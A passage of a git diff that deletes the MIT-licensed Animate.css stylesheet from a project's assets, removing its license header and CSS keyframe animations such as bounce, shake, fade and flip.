diff --git a/newDesign/assets/css/animate.css b/newDesign/assets/css/animate.css
deleted file mode 100644
index 97f28788e..000000000
--- a/newDesign/assets/css/animate.css
+++ /dev/null
@@ -1,2744 +0,0 @@ -@charset "UTF-8"; - - -/*! -Animate.css - http://daneden.me/animate -Licensed under the MIT license - -Copyright (c) 2013 Daniel Eden - -Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
-*/ - -.animated { - -webkit-animation-duration: 1s; - animation-duration: 1s; - -webkit-animation-fill-mode: both; - animation-fill-mode: both; -} - -.animated.hinge { - -webkit-animation-duration: 2s; - animation-duration: 2s; -} - -@-webkit-keyframes bounce { - 0%, 20%, 50%, 80%, 100% { - -webkit-transform: translateY(0); - transform: translateY(0); - } - - 40% { - -webkit-transform: translateY(-30px); - transform: translateY(-30px); - } - - 60% { - -webkit-transform: translateY(-15px); - transform: translateY(-15px); - } -} - -@keyframes bounce { - 0%, 20%, 50%, 80%, 100% { - -webkit-transform: translateY(0); - -ms-transform: translateY(0); - transform: translateY(0); - } - - 40% { - -webkit-transform: translateY(-30px); - -ms-transform: translateY(-30px); - transform: translateY(-30px); - } - - 60% { - -webkit-transform: translateY(-15px); - -ms-transform: translateY(-15px); - transform: translateY(-15px); - } -} - -.bounce { - -webkit-animation-name: bounce; - animation-name: bounce; -} - -@-webkit-keyframes flash { - 0%, 50%, 100% { - opacity: 1; - } - - 25%, 75% { - opacity: 0; - } -} - -@keyframes flash { - 0%, 50%, 100% { - opacity: 1; - } - - 25%, 75% { - opacity: 0; - } -} - -.flash { - -webkit-animation-name: flash; - animation-name: flash; -} - -/* originally authored by Nick Pettit - https://github.com/nickpettit/glide */ - -@-webkit-keyframes pulse { - 0% { - -webkit-transform: scale(1); - transform: scale(1); - } - - 50% { - -webkit-transform: scale(1.1); - transform: scale(1.1); - } - - 100% { - -webkit-transform: scale(1); - transform: scale(1); - } -} - -@keyframes pulse { - 0% { - -webkit-transform: scale(1); - -ms-transform: scale(1); - transform: scale(1); - } - - 50% { - -webkit-transform: scale(1.1); - -ms-transform: scale(1.1); - transform: scale(1.1); - } - - 100% { - -webkit-transform: scale(1); - -ms-transform: scale(1); - transform: scale(1); - } -} - -.pulse { - -webkit-animation-name: pulse; - animation-name: pulse; -} - 
-@-webkit-keyframes shake { - 0%, 100% { - -webkit-transform: translateX(0); - transform: translateX(0); - } - - 10%, 30%, 50%, 70%, 90% { - -webkit-transform: translateX(-10px); - transform: translateX(-10px); - } - - 20%, 40%, 60%, 80% { - -webkit-transform: translateX(10px); - transform: translateX(10px); - } -} - -@keyframes shake { - 0%, 100% { - -webkit-transform: translateX(0); - -ms-transform: translateX(0); - transform: translateX(0); - } - - 10%, 30%, 50%, 70%, 90% { - -webkit-transform: translateX(-10px); - -ms-transform: translateX(-10px); - transform: translateX(-10px); - } - - 20%, 40%, 60%, 80% { - -webkit-transform: translateX(10px); - -ms-transform: translateX(10px); - transform: translateX(10px); - } -} - -.shake { - -webkit-animation-name: shake; - animation-name: shake; -} - -@-webkit-keyframes swing { - 20% { - -webkit-transform: rotate(15deg); - transform: rotate(15deg); - } - - 40% { - -webkit-transform: rotate(-10deg); - transform: rotate(-10deg); - } - - 60% { - -webkit-transform: rotate(5deg); - transform: rotate(5deg); - } - - 80% { - -webkit-transform: rotate(-5deg); - transform: rotate(-5deg); - } - - 100% { - -webkit-transform: rotate(0deg); - transform: rotate(0deg); - } -} - -@keyframes swing { - 20% { - -webkit-transform: rotate(15deg); - -ms-transform: rotate(15deg); - transform: rotate(15deg); - } - - 40% { - -webkit-transform: rotate(-10deg); - -ms-transform: rotate(-10deg); - transform: rotate(-10deg); - } - - 60% { - -webkit-transform: rotate(5deg); - -ms-transform: rotate(5deg); - transform: rotate(5deg); - } - - 80% { - -webkit-transform: rotate(-5deg); - -ms-transform: rotate(-5deg); - transform: rotate(-5deg); - } - - 100% { - -webkit-transform: rotate(0deg); - -ms-transform: rotate(0deg); - transform: rotate(0deg); - } -} - -.swing { - -webkit-transform-origin: top center; - -ms-transform-origin: top center; - transform-origin: top center; - -webkit-animation-name: swing; - animation-name: swing; -} - -@-webkit-keyframes 
tada { - 0% { - -webkit-transform: scale(1); - transform: scale(1); - } - - 10%, 20% { - -webkit-transform: scale(0.9) rotate(-3deg); - transform: scale(0.9) rotate(-3deg); - } - - 30%, 50%, 70%, 90% { - -webkit-transform: scale(1.1) rotate(3deg); - transform: scale(1.1) rotate(3deg); - } - - 40%, 60%, 80% { - -webkit-transform: scale(1.1) rotate(-3deg); - transform: scale(1.1) rotate(-3deg); - } - - 100% { - -webkit-transform: scale(1) rotate(0); - transform: scale(1) rotate(0); - } -} - -@keyframes tada { - 0% { - -webkit-transform: scale(1); - -ms-transform: scale(1); - transform: scale(1); - } - - 10%, 20% { - -webkit-transform: scale(0.9) rotate(-3deg); - -ms-transform: scale(0.9) rotate(-3deg); - transform: scale(0.9) rotate(-3deg); - } - - 30%, 50%, 70%, 90% { - -webkit-transform: scale(1.1) rotate(3deg); - -ms-transform: scale(1.1) rotate(3deg); - transform: scale(1.1) rotate(3deg); - } - - 40%, 60%, 80% { - -webkit-transform: scale(1.1) rotate(-3deg); - -ms-transform: scale(1.1) rotate(-3deg); - transform: scale(1.1) rotate(-3deg); - } - - 100% { - -webkit-transform: scale(1) rotate(0); - -ms-transform: scale(1) rotate(0); - transform: scale(1) rotate(0); - } -} - -.tada { - -webkit-animation-name: tada; - animation-name: tada; -} - -/* originally authored by Nick Pettit - https://github.com/nickpettit/glide */ - -@-webkit-keyframes wobble { - 0% { - -webkit-transform: translateX(0%); - transform: translateX(0%); - } - - 15% { - -webkit-transform: translateX(-25%) rotate(-5deg); - transform: translateX(-25%) rotate(-5deg); - } - - 30% { - -webkit-transform: translateX(20%) rotate(3deg); - transform: translateX(20%) rotate(3deg); - } - - 45% { - -webkit-transform: translateX(-15%) rotate(-3deg); - transform: translateX(-15%) rotate(-3deg); - } - - 60% { - -webkit-transform: translateX(10%) rotate(2deg); - transform: translateX(10%) rotate(2deg); - } - - 75% { - -webkit-transform: translateX(-5%) rotate(-1deg); - transform: translateX(-5%) rotate(-1deg); - } 
- - 100% { - -webkit-transform: translateX(0%); - transform: translateX(0%); - } -} - -@keyframes wobble { - 0% { - -webkit-transform: translateX(0%); - -ms-transform: translateX(0%); - transform: translateX(0%); - } - - 15% { - -webkit-transform: translateX(-25%) rotate(-5deg); - -ms-transform: translateX(-25%) rotate(-5deg); - transform: translateX(-25%) rotate(-5deg); - } - - 30% { - -webkit-transform: translateX(20%) rotate(3deg); - -ms-transform: translateX(20%) rotate(3deg); - transform: translateX(20%) rotate(3deg); - } - - 45% { - -webkit-transform: translateX(-15%) rotate(-3deg); - -ms-transform: translateX(-15%) rotate(-3deg); - transform: translateX(-15%) rotate(-3deg); - } - - 60% { - -webkit-transform: translateX(10%) rotate(2deg); - -ms-transform: translateX(10%) rotate(2deg); - transform: translateX(10%) rotate(2deg); - } - - 75% { - -webkit-transform: translateX(-5%) rotate(-1deg); - -ms-transform: translateX(-5%) rotate(-1deg); - transform: translateX(-5%) rotate(-1deg); - } - - 100% { - -webkit-transform: translateX(0%); - -ms-transform: translateX(0%); - transform: translateX(0%); - } -} - -.wobble { - -webkit-animation-name: wobble; - animation-name: wobble; -} - -@-webkit-keyframes bounceIn { - 0% { - opacity: 0; - -webkit-transform: scale(.3); - transform: scale(.3); - } - - 50% { - opacity: 1; - -webkit-transform: scale(1.05); - transform: scale(1.05); - } - - 70% { - -webkit-transform: scale(.9); - transform: scale(.9); - } - - 100% { - -webkit-transform: scale(1); - transform: scale(1); - } -} - -@keyframes bounceIn { - 0% { - opacity: 0; - -webkit-transform: scale(.3); - -ms-transform: scale(.3); - transform: scale(.3); - } - - 50% { - opacity: 1; - -webkit-transform: scale(1.05); - -ms-transform: scale(1.05); - transform: scale(1.05); - } - - 70% { - -webkit-transform: scale(.9); - -ms-transform: scale(.9); - transform: scale(.9); - } - - 100% { - -webkit-transform: scale(1); - -ms-transform: scale(1); - transform: scale(1); - } -} - 
-.bounceIn { - -webkit-animation-name: bounceIn; - animation-name: bounceIn; -} - -@-webkit-keyframes bounceInDown { - 0% { - opacity: 0; - -webkit-transform: translateY(-2000px); - transform: translateY(-2000px); - } - - 60% { - opacity: 1; - -webkit-transform: translateY(30px); - transform: translateY(30px); - } - - 80% { - -webkit-transform: translateY(-10px); - transform: translateY(-10px); - } - - 100% { - -webkit-transform: translateY(0); - transform: translateY(0); - } -} - -@keyframes bounceInDown { - 0% { - opacity: 0; - -webkit-transform: translateY(-2000px); - -ms-transform: translateY(-2000px); - transform: translateY(-2000px); - } - - 60% { - opacity: 1; - -webkit-transform: translateY(30px); - -ms-transform: translateY(30px); - transform: translateY(30px); - } - - 80% { - -webkit-transform: translateY(-10px); - -ms-transform: translateY(-10px); - transform: translateY(-10px); - } - - 100% { - -webkit-transform: translateY(0); - -ms-transform: translateY(0); - transform: translateY(0); - } -} - -.bounceInDown { - -webkit-animation-name: bounceInDown; - animation-name: bounceInDown; -} - -@-webkit-keyframes bounceInLeft { - 0% { - opacity: 0; - -webkit-transform: translateX(-2000px); - transform: translateX(-2000px); - } - - 60% { - opacity: 1; - -webkit-transform: translateX(30px); - transform: translateX(30px); - } - - 80% { - -webkit-transform: translateX(-10px); - transform: translateX(-10px); - } - - 100% { - -webkit-transform: translateX(0); - transform: translateX(0); - } -} - -@keyframes bounceInLeft { - 0% { - opacity: 0; - -webkit-transform: translateX(-2000px); - -ms-transform: translateX(-2000px); - transform: translateX(-2000px); - } - - 60% { - opacity: 1; - -webkit-transform: translateX(30px); - -ms-transform: translateX(30px); - transform: translateX(30px); - } - - 80% { - -webkit-transform: translateX(-10px); - -ms-transform: translateX(-10px); - transform: translateX(-10px); - } - - 100% { - -webkit-transform: translateX(0); - 
-ms-transform: translateX(0); - transform: translateX(0); - } -} - -.bounceInLeft { - -webkit-animation-name: bounceInLeft; - animation-name: bounceInLeft; -} - -@-webkit-keyframes bounceInRight { - 0% { - opacity: 0; - -webkit-transform: translateX(2000px); - transform: translateX(2000px); - } - - 60% { - opacity: 1; - -webkit-transform: translateX(-30px); - transform: translateX(-30px); - } - - 80% { - -webkit-transform: translateX(10px); - transform: translateX(10px); - } - - 100% { - -webkit-transform: translateX(0); - transform: translateX(0); - } -} - -@keyframes bounceInRight { - 0% { - opacity: 0; - -webkit-transform: translateX(2000px); - -ms-transform: translateX(2000px); - transform: translateX(2000px); - } - - 60% { - opacity: 1; - -webkit-transform: translateX(-30px); - -ms-transform: translateX(-30px); - transform: translateX(-30px); - } - - 80% { - -webkit-transform: translateX(10px); - -ms-transform: translateX(10px); - transform: translateX(10px); - } - - 100% { - -webkit-transform: translateX(0); - -ms-transform: translateX(0); - transform: translateX(0); - } -} - -.bounceInRight { - -webkit-animation-name: bounceInRight; - animation-name: bounceInRight; -} - -@-webkit-keyframes bounceInUp { - 0% { - opacity: 0; - -webkit-transform: translateY(2000px); - transform: translateY(2000px); - } - - 60% { - opacity: 1; - -webkit-transform: translateY(-30px); - transform: translateY(-30px); - } - - 80% { - -webkit-transform: translateY(10px); - transform: translateY(10px); - } - - 100% { - -webkit-transform: translateY(0); - transform: translateY(0); - } -} - -@keyframes bounceInUp { - 0% { - opacity: 0; - -webkit-transform: translateY(2000px); - -ms-transform: translateY(2000px); - transform: translateY(2000px); - } - - 60% { - opacity: 1; - -webkit-transform: translateY(-30px); - -ms-transform: translateY(-30px); - transform: translateY(-30px); - } - - 80% { - -webkit-transform: translateY(10px); - -ms-transform: translateY(10px); - transform: 
translateY(10px); - } - - 100% { - -webkit-transform: translateY(0); - -ms-transform: translateY(0); - transform: translateY(0); - } -} - -.bounceInUp { - -webkit-animation-name: bounceInUp; - animation-name: bounceInUp; -} - -@-webkit-keyframes bounceOut { - 0% { - -webkit-transform: scale(1); - transform: scale(1); - } - - 25% { - -webkit-transform: scale(.95); - transform: scale(.95); - } - - 50% { - opacity: 1; - -webkit-transform: scale(1.1); - transform: scale(1.1); - } - - 100% { - opacity: 0; - -webkit-transform: scale(.3); - transform: scale(.3); - } -} - -@keyframes bounceOut { - 0% { - -webkit-transform: scale(1); - -ms-transform: scale(1); - transform: scale(1); - } - - 25% { - -webkit-transform: scale(.95); - -ms-transform: scale(.95); - transform: scale(.95); - } - - 50% { - opacity: 1; - -webkit-transform: scale(1.1); - -ms-transform: scale(1.1); - transform: scale(1.1); - } - - 100% { - opacity: 0; - -webkit-transform: scale(.3); - -ms-transform: scale(.3); - transform: scale(.3); - } -} - -.bounceOut { - -webkit-animation-name: bounceOut; - animation-name: bounceOut; -} - -@-webkit-keyframes bounceOutDown { - 0% { - -webkit-transform: translateY(0); - transform: translateY(0); - } - - 20% { - opacity: 1; - -webkit-transform: translateY(-20px); - transform: translateY(-20px); - } - - 100% { - opacity: 0; - -webkit-transform: translateY(2000px); - transform: translateY(2000px); - } -} - -@keyframes bounceOutDown { - 0% { - -webkit-transform: translateY(0); - -ms-transform: translateY(0); - transform: translateY(0); - } - - 20% { - opacity: 1; - -webkit-transform: translateY(-20px); - -ms-transform: translateY(-20px); - transform: translateY(-20px); - } - - 100% { - opacity: 0; - -webkit-transform: translateY(2000px); - -ms-transform: translateY(2000px); - transform: translateY(2000px); - } -} - -.bounceOutDown { - -webkit-animation-name: bounceOutDown; - animation-name: bounceOutDown; -} - -@-webkit-keyframes bounceOutLeft { - 0% { - 
-webkit-transform: translateX(0); - transform: translateX(0); - } - - 20% { - opacity: 1; - -webkit-transform: translateX(20px); - transform: translateX(20px); - } - - 100% { - opacity: 0; - -webkit-transform: translateX(-2000px); - transform: translateX(-2000px); - } -} - -@keyframes bounceOutLeft { - 0% { - -webkit-transform: translateX(0); - -ms-transform: translateX(0); - transform: translateX(0); - } - - 20% { - opacity: 1; - -webkit-transform: translateX(20px); - -ms-transform: translateX(20px); - transform: translateX(20px); - } - - 100% { - opacity: 0; - -webkit-transform: translateX(-2000px); - -ms-transform: translateX(-2000px); - transform: translateX(-2000px); - } -} - -.bounceOutLeft { - -webkit-animation-name: bounceOutLeft; - animation-name: bounceOutLeft; -} - -@-webkit-keyframes bounceOutRight { - 0% { - -webkit-transform: translateX(0); - transform: translateX(0); - } - - 20% { - opacity: 1; - -webkit-transform: translateX(-20px); - transform: translateX(-20px); - } - - 100% { - opacity: 0; - -webkit-transform: translateX(2000px); - transform: translateX(2000px); - } -} - -@keyframes bounceOutRight { - 0% { - -webkit-transform: translateX(0); - -ms-transform: translateX(0); - transform: translateX(0); - } - - 20% { - opacity: 1; - -webkit-transform: translateX(-20px); - -ms-transform: translateX(-20px); - transform: translateX(-20px); - } - - 100% { - opacity: 0; - -webkit-transform: translateX(2000px); - -ms-transform: translateX(2000px); - transform: translateX(2000px); - } -} - -.bounceOutRight { - -webkit-animation-name: bounceOutRight; - animation-name: bounceOutRight; -} - -@-webkit-keyframes bounceOutUp { - 0% { - -webkit-transform: translateY(0); - transform: translateY(0); - } - - 20% { - opacity: 1; - -webkit-transform: translateY(20px); - transform: translateY(20px); - } - - 100% { - opacity: 0; - -webkit-transform: translateY(-2000px); - transform: translateY(-2000px); - } -} - -@keyframes bounceOutUp { - 0% { - -webkit-transform: 
translateY(0); - -ms-transform: translateY(0); - transform: translateY(0); - } - - 20% { - opacity: 1; - -webkit-transform: translateY(20px); - -ms-transform: translateY(20px); - transform: translateY(20px); - } - - 100% { - opacity: 0; - -webkit-transform: translateY(-2000px); - -ms-transform: translateY(-2000px); - transform: translateY(-2000px); - } -} - -.bounceOutUp { - -webkit-animation-name: bounceOutUp; - animation-name: bounceOutUp; -} - -@-webkit-keyframes fadeIn { - 0% { - opacity: 0; - } - - 100% { - opacity: 1; - } -} - -@keyframes fadeIn { - 0% { - opacity: 0; - } - - 100% { - opacity: 1; - } -} - -.fadeIn { - -webkit-animation-name: fadeIn; - animation-name: fadeIn; -} - -@-webkit-keyframes fadeInDown { - 0% { - opacity: 0; - -webkit-transform: translateY(-20px); - transform: translateY(-20px); - } - - 100% { - opacity: 1; - -webkit-transform: translateY(0); - transform: translateY(0); - } -} - -@keyframes fadeInDown { - 0% { - opacity: 0; - -webkit-transform: translateY(-20px); - -ms-transform: translateY(-20px); - transform: translateY(-20px); - } - - 100% { - opacity: 1; - -webkit-transform: translateY(0); - -ms-transform: translateY(0); - transform: translateY(0); - } -} - -.fadeInDown { - -webkit-animation-name: fadeInDown; - animation-name: fadeInDown; -} - -@-webkit-keyframes fadeInDownBig { - 0% { - opacity: 0; - -webkit-transform: translateY(-2000px); - transform: translateY(-2000px); - } - - 100% { - opacity: 1; - -webkit-transform: translateY(0); - transform: translateY(0); - } -} - -@keyframes fadeInDownBig { - 0% { - opacity: 0; - -webkit-transform: translateY(-2000px); - -ms-transform: translateY(-2000px); - transform: translateY(-2000px); - } - - 100% { - opacity: 1; - -webkit-transform: translateY(0); - -ms-transform: translateY(0); - transform: translateY(0); - } -} - -.fadeInDownBig { - -webkit-animation-name: fadeInDownBig; - animation-name: fadeInDownBig; -} - -@-webkit-keyframes fadeInLeft { - 0% { - opacity: 0; - 
-webkit-transform: translateX(-20px); - transform: translateX(-20px); - } - - 100% { - opacity: 1; - -webkit-transform: translateX(0); - transform: translateX(0); - } -} - -@keyframes fadeInLeft { - 0% { - opacity: 0; - -webkit-transform: translateX(-20px); - -ms-transform: translateX(-20px); - transform: translateX(-20px); - } - - 100% { - opacity: 1; - -webkit-transform: translateX(0); - -ms-transform: translateX(0); - transform: translateX(0); - } -} - -.fadeInLeft { - -webkit-animation-name: fadeInLeft; - animation-name: fadeInLeft; -} - -@-webkit-keyframes fadeInLeftBig { - 0% { - opacity: 0; - -webkit-transform: translateX(-2000px); - transform: translateX(-2000px); - } - - 100% { - opacity: 1; - -webkit-transform: translateX(0); - transform: translateX(0); - } -} - -@keyframes fadeInLeftBig { - 0% { - opacity: 0; - -webkit-transform: translateX(-2000px); - -ms-transform: translateX(-2000px); - transform: translateX(-2000px); - } - - 100% { - opacity: 1; - -webkit-transform: translateX(0); - -ms-transform: translateX(0); - transform: translateX(0); - } -} - -.fadeInLeftBig { - -webkit-animation-name: fadeInLeftBig; - animation-name: fadeInLeftBig; -} - -@-webkit-keyframes fadeInRight { - 0% { - opacity: 0; - -webkit-transform: translateX(20px); - transform: translateX(20px); - } - - 100% { - opacity: 1; - -webkit-transform: translateX(0); - transform: translateX(0); - } -} - -@keyframes fadeInRight { - 0% { - opacity: 0; - -webkit-transform: translateX(20px); - -ms-transform: translateX(20px); - transform: translateX(20px); - } - - 100% { - opacity: 1; - -webkit-transform: translateX(0); - -ms-transform: translateX(0); - transform: translateX(0); - } -} - -.fadeInRight { - -webkit-animation-name: fadeInRight; - animation-name: fadeInRight; -} - -@-webkit-keyframes fadeInRightBig { - 0% { - opacity: 0; - -webkit-transform: translateX(2000px); - transform: translateX(2000px); - } - - 100% { - opacity: 1; - -webkit-transform: translateX(0); - transform: 
translateX(0); - } -} - -@keyframes fadeInRightBig { - 0% { - opacity: 0; - -webkit-transform: translateX(2000px); - -ms-transform: translateX(2000px); - transform: translateX(2000px); - } - - 100% { - opacity: 1; - -webkit-transform: translateX(0); - -ms-transform: translateX(0); - transform: translateX(0); - } -} - -.fadeInRightBig { - -webkit-animation-name: fadeInRightBig; - animation-name: fadeInRightBig; -} - -@-webkit-keyframes fadeInUp { - 0% { - opacity: 0; - -webkit-transform: translateY(20px); - transform: translateY(20px); - } - - 100% { - opacity: 1; - -webkit-transform: translateY(0); - transform: translateY(0); - } -} - -@keyframes fadeInUp { - 0% { - opacity: 0; - -webkit-transform: translateY(20px); - -ms-transform: translateY(20px); - transform: translateY(20px); - } - - 100% { - opacity: 1; - -webkit-transform: translateY(0); - -ms-transform: translateY(0); - transform: translateY(0); - } -} - -.fadeInUp { - -webkit-animation-name: fadeInUp; - animation-name: fadeInUp; -} - -@-webkit-keyframes fadeInUpBig { - 0% { - opacity: 0; - -webkit-transform: translateY(2000px); - transform: translateY(2000px); - } - - 100% { - opacity: 1; - -webkit-transform: translateY(0); - transform: translateY(0); - } -} - -@keyframes fadeInUpBig { - 0% { - opacity: 0; - -webkit-transform: translateY(2000px); - -ms-transform: translateY(2000px); - transform: translateY(2000px); - } - - 100% { - opacity: 1; - -webkit-transform: translateY(0); - -ms-transform: translateY(0); - transform: translateY(0); - } -} - -.fadeInUpBig { - -webkit-animation-name: fadeInUpBig; - animation-name: fadeInUpBig; -} - -@-webkit-keyframes fadeOut { - 0% { - opacity: 1; - } - - 100% { - opacity: 0; - } -} - -@keyframes fadeOut { - 0% { - opacity: 1; - } - - 100% { - opacity: 0; - } -} - -.fadeOut { - -webkit-animation-name: fadeOut; - animation-name: fadeOut; -} - -@-webkit-keyframes fadeOutDown { - 0% { - opacity: 1; - -webkit-transform: translateY(0); - transform: translateY(0); - } - - 
100% { - opacity: 0; - -webkit-transform: translateY(20px); - transform: translateY(20px); - } -} - -@keyframes fadeOutDown { - 0% { - opacity: 1; - -webkit-transform: translateY(0); - -ms-transform: translateY(0); - transform: translateY(0); - } - - 100% { - opacity: 0; - -webkit-transform: translateY(20px); - -ms-transform: translateY(20px); - transform: translateY(20px); - } -} - -.fadeOutDown { - -webkit-animation-name: fadeOutDown; - animation-name: fadeOutDown; -} - -@-webkit-keyframes fadeOutDownBig { - 0% { - opacity: 1; - -webkit-transform: translateY(0); - transform: translateY(0); - } - - 100% { - opacity: 0; - -webkit-transform: translateY(2000px); - transform: translateY(2000px); - } -} - -@keyframes fadeOutDownBig { - 0% { - opacity: 1; - -webkit-transform: translateY(0); - -ms-transform: translateY(0); - transform: translateY(0); - } - - 100% { - opacity: 0; - -webkit-transform: translateY(2000px); - -ms-transform: translateY(2000px); - transform: translateY(2000px); - } -} - -.fadeOutDownBig { - -webkit-animation-name: fadeOutDownBig; - animation-name: fadeOutDownBig; -} - -@-webkit-keyframes fadeOutLeft { - 0% { - opacity: 1; - -webkit-transform: translateX(0); - transform: translateX(0); - } - - 100% { - opacity: 0; - -webkit-transform: translateX(-20px); - transform: translateX(-20px); - } -} - -@keyframes fadeOutLeft { - 0% { - opacity: 1; - -webkit-transform: translateX(0); - -ms-transform: translateX(0); - transform: translateX(0); - } - - 100% { - opacity: 0; - -webkit-transform: translateX(-20px); - -ms-transform: translateX(-20px); - transform: translateX(-20px); - } -} - -.fadeOutLeft { - -webkit-animation-name: fadeOutLeft; - animation-name: fadeOutLeft; -} - -@-webkit-keyframes fadeOutLeftBig { - 0% { - opacity: 1; - -webkit-transform: translateX(0); - transform: translateX(0); - } - - 100% { - opacity: 0; - -webkit-transform: translateX(-2000px); - transform: translateX(-2000px); - } -} - -@keyframes fadeOutLeftBig { - 0% { - opacity: 
1; - -webkit-transform: translateX(0); - -ms-transform: translateX(0); - transform: translateX(0); - } - - 100% { - opacity: 0; - -webkit-transform: translateX(-2000px); - -ms-transform: translateX(-2000px); - transform: translateX(-2000px); - } -} - -.fadeOutLeftBig { - -webkit-animation-name: fadeOutLeftBig; - animation-name: fadeOutLeftBig; -} - -@-webkit-keyframes fadeOutRight { - 0% { - opacity: 1; - -webkit-transform: translateX(0); - transform: translateX(0); - } - - 100% { - opacity: 0; - -webkit-transform: translateX(20px); - transform: translateX(20px); - } -} - -@keyframes fadeOutRight { - 0% { - opacity: 1; - -webkit-transform: translateX(0); - -ms-transform: translateX(0); - transform: translateX(0); - } - - 100% { - opacity: 0; - -webkit-transform: translateX(20px); - -ms-transform: translateX(20px); - transform: translateX(20px); - } -} - -.fadeOutRight { - -webkit-animation-name: fadeOutRight; - animation-name: fadeOutRight; -} - -@-webkit-keyframes fadeOutRightBig { - 0% { - opacity: 1; - -webkit-transform: translateX(0); - transform: translateX(0); - } - - 100% { - opacity: 0; - -webkit-transform: translateX(2000px); - transform: translateX(2000px); - } -} - -@keyframes fadeOutRightBig { - 0% { - opacity: 1; - -webkit-transform: translateX(0); - -ms-transform: translateX(0); - transform: translateX(0); - } - - 100% { - opacity: 0; - -webkit-transform: translateX(2000px); - -ms-transform: translateX(2000px); - transform: translateX(2000px); - } -} - -.fadeOutRightBig { - -webkit-animation-name: fadeOutRightBig; - animation-name: fadeOutRightBig; -} - -@-webkit-keyframes fadeOutUp { - 0% { - opacity: 1; - -webkit-transform: translateY(0); - transform: translateY(0); - } - - 100% { - opacity: 0; - -webkit-transform: translateY(-20px); - transform: translateY(-20px); - } -} - -@keyframes fadeOutUp { - 0% { - opacity: 1; - -webkit-transform: translateY(0); - -ms-transform: translateY(0); - transform: translateY(0); - } - - 100% { - opacity: 0; - 
-webkit-transform: translateY(-20px); - -ms-transform: translateY(-20px); - transform: translateY(-20px); - } -} - -.fadeOutUp { - -webkit-animation-name: fadeOutUp; - animation-name: fadeOutUp; -} - -@-webkit-keyframes fadeOutUpBig { - 0% { - opacity: 1; - -webkit-transform: translateY(0); - transform: translateY(0); - } - - 100% { - opacity: 0; - -webkit-transform: translateY(-2000px); - transform: translateY(-2000px); - } -} - -@keyframes fadeOutUpBig { - 0% { - opacity: 1; - -webkit-transform: translateY(0); - -ms-transform: translateY(0); - transform: translateY(0); - } - - 100% { - opacity: 0; - -webkit-transform: translateY(-2000px); - -ms-transform: translateY(-2000px); - transform: translateY(-2000px); - } -} - -.fadeOutUpBig { - -webkit-animation-name: fadeOutUpBig; - animation-name: fadeOutUpBig; -} - -@-webkit-keyframes flip { - 0% { - -webkit-transform: perspective(400px) translateZ(0) rotateY(0) scale(1); - transform: perspective(400px) translateZ(0) rotateY(0) scale(1); - -webkit-animation-timing-function: ease-out; - animation-timing-function: ease-out; - } - - 40% { - -webkit-transform: perspective(400px) translateZ(150px) rotateY(170deg) scale(1); - transform: perspective(400px) translateZ(150px) rotateY(170deg) scale(1); - -webkit-animation-timing-function: ease-out; - animation-timing-function: ease-out; - } - - 50% { - -webkit-transform: perspective(400px) translateZ(150px) rotateY(190deg) scale(1); - transform: perspective(400px) translateZ(150px) rotateY(190deg) scale(1); - -webkit-animation-timing-function: ease-in; - animation-timing-function: ease-in; - } - - 80% { - -webkit-transform: perspective(400px) translateZ(0) rotateY(360deg) scale(.95); - transform: perspective(400px) translateZ(0) rotateY(360deg) scale(.95); - -webkit-animation-timing-function: ease-in; - animation-timing-function: ease-in; - } - - 100% { - -webkit-transform: perspective(400px) translateZ(0) rotateY(360deg) scale(1); - transform: perspective(400px) translateZ(0) 
rotateY(360deg) scale(1); - -webkit-animation-timing-function: ease-in; - animation-timing-function: ease-in; - } -} - -@keyframes flip { - 0% { - -webkit-transform: perspective(400px) translateZ(0) rotateY(0) scale(1); - -ms-transform: perspective(400px) translateZ(0) rotateY(0) scale(1); - transform: perspective(400px) translateZ(0) rotateY(0) scale(1); - -webkit-animation-timing-function: ease-out; - animation-timing-function: ease-out; - } - - 40% { - -webkit-transform: perspective(400px) translateZ(150px) rotateY(170deg) scale(1); - -ms-transform: perspective(400px) translateZ(150px) rotateY(170deg) scale(1); - transform: perspective(400px) translateZ(150px) rotateY(170deg) scale(1); - -webkit-animation-timing-function: ease-out; - animation-timing-function: ease-out; - } - - 50% { - -webkit-transform: perspective(400px) translateZ(150px) rotateY(190deg) scale(1); - -ms-transform: perspective(400px) translateZ(150px) rotateY(190deg) scale(1); - transform: perspective(400px) translateZ(150px) rotateY(190deg) scale(1); - -webkit-animation-timing-function: ease-in; - animation-timing-function: ease-in; - } - - 80% { - -webkit-transform: perspective(400px) translateZ(0) rotateY(360deg) scale(.95); - -ms-transform: perspective(400px) translateZ(0) rotateY(360deg) scale(.95); - transform: perspective(400px) translateZ(0) rotateY(360deg) scale(.95); - -webkit-animation-timing-function: ease-in; - animation-timing-function: ease-in; - } - - 100% { - -webkit-transform: perspective(400px) translateZ(0) rotateY(360deg) scale(1); - -ms-transform: perspective(400px) translateZ(0) rotateY(360deg) scale(1); - transform: perspective(400px) translateZ(0) rotateY(360deg) scale(1); - -webkit-animation-timing-function: ease-in; - animation-timing-function: ease-in; - } -} - -.animated.flip { - -webkit-backface-visibility: visible; - -ms-backface-visibility: visible; - backface-visibility: visible; - -webkit-animation-name: flip; - animation-name: flip; -} - -@-webkit-keyframes 
